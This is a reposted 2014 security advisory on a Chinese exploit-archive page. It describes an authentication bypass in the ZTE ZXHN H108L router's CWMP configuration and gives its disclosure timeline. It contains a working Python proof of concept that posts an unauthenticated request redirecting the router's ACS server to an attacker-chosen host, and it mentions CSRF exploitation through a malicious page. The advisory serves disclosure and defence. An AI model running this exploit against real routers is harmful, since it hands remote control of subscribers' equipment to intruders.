首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ZTE ZXHN H108L - Authentication Bypass
来源:https://projectzero.gr 作者:projectzero 发布时间:2014-11-18  
About the software
==================
  
ZTE ZXHN H108L is provided by some large Greek ISPs to their subscribers.
  
Vulnerability Details
=====================
  
CWMP configuration is accessible only through the Administrator account. CWMP is a protocol widely used by ISPs worldwide for remote provisioning and troubleshooting their subscribers' equipment. However editing the CWMP configuration (more specifically sending the POST request) does not require any user authentication.
  
Affected Products
=================
Device model : ZTE ZXHN H108L
Firmware Version : ZXHN H108LV4.0.0d_ZRQ_GR4
  
Proof of Concept
================
  
#!/usr/bin/python
  
import requests
  
acs_server = "http://<server>:<port>"
acs_user = "user"
acs_pass = "pass"
  
# Connection request parameters. When a request is made to the following URL, using the specified user/pass combination,
# router will connect back to the ACS server.
  
conn_url = "/tr069"
conn_port = "7564"
conn_user = "user"
conn_pass = "pass"
  
#Periodic inform parameters
active = 1
interval = 2000
  
payload = {'CWMP_active': '1', 'CWMP_ACSURL': acs_server,'CWMP_ACSUserName': acs_user,'CWMP_ACSPassword': acs_pass, 'CWMP_ConnectionRequestPath': conn_url, 'CWMP_ConnectionRequestPort': conn_port, 'CWMP_ConnectionRequestUserName': conn_user, 'CWMP_ConnectionRequestPassword': conn_pass, 'CWMP_PeriodActive': active, 'CWMP_PeriodInterval': interval, 'CWMPLockFlag': '0' }
  
r = requests.post("http://192.168.1.254/Forms/access_cwmp_1", data=payload)
  
Impact
======
  
The described vulnerability allows any unauthenticated user to edit the CWMP configuration. Exploitation can be performed by LAN users or through the Internet if the router is configured to expose the web interface to WAN. Also because the router lacks of CSRF protection, malicious JS code can be deployed in order to exploit the vulnerability through a  malicious web page.
  
Severity
========
  
Medium
  
References
==========
  
https://projectzero.gr/en/2014/11/zte-zxhn-h108l-authentication-bypass/
  
  
Disclosure Timeline
===================
  
27/10/2014 - First communication attempt to both vendor and ISP
04/11/2014 - ZTE response states that ISP should be contacted
03/11/2014 - Second attempt to contact the ISP.
14/11/2014 - No response from ISP. Public Disclosure
  
Contact Information
===================
Domain:    https://projectzero.gr
Social:    twitter.com/projectzerolabs

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Safari 8.0 / OS X 10.10 - Cras
·ZTE ZXHN H108L - Authenticatio
·ossec 2.8 Insecure Temporary F
·PHP 5.x - Bypass Disable Funct
·MS14-064 Microsoft Windows OLE
·Joomla HD FLV 2.1.0.1 Arbitrar
·MS14-064 Microsoft Windows OLE
·MantisBT XmlImportExport Plugi
·MS14-064 Microsoft Windows OLE
·Samsung Galaxy KNOX Android Br
·Internet Explorer OLE Automati
·Internet Explorer 8 - Fixed Co
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved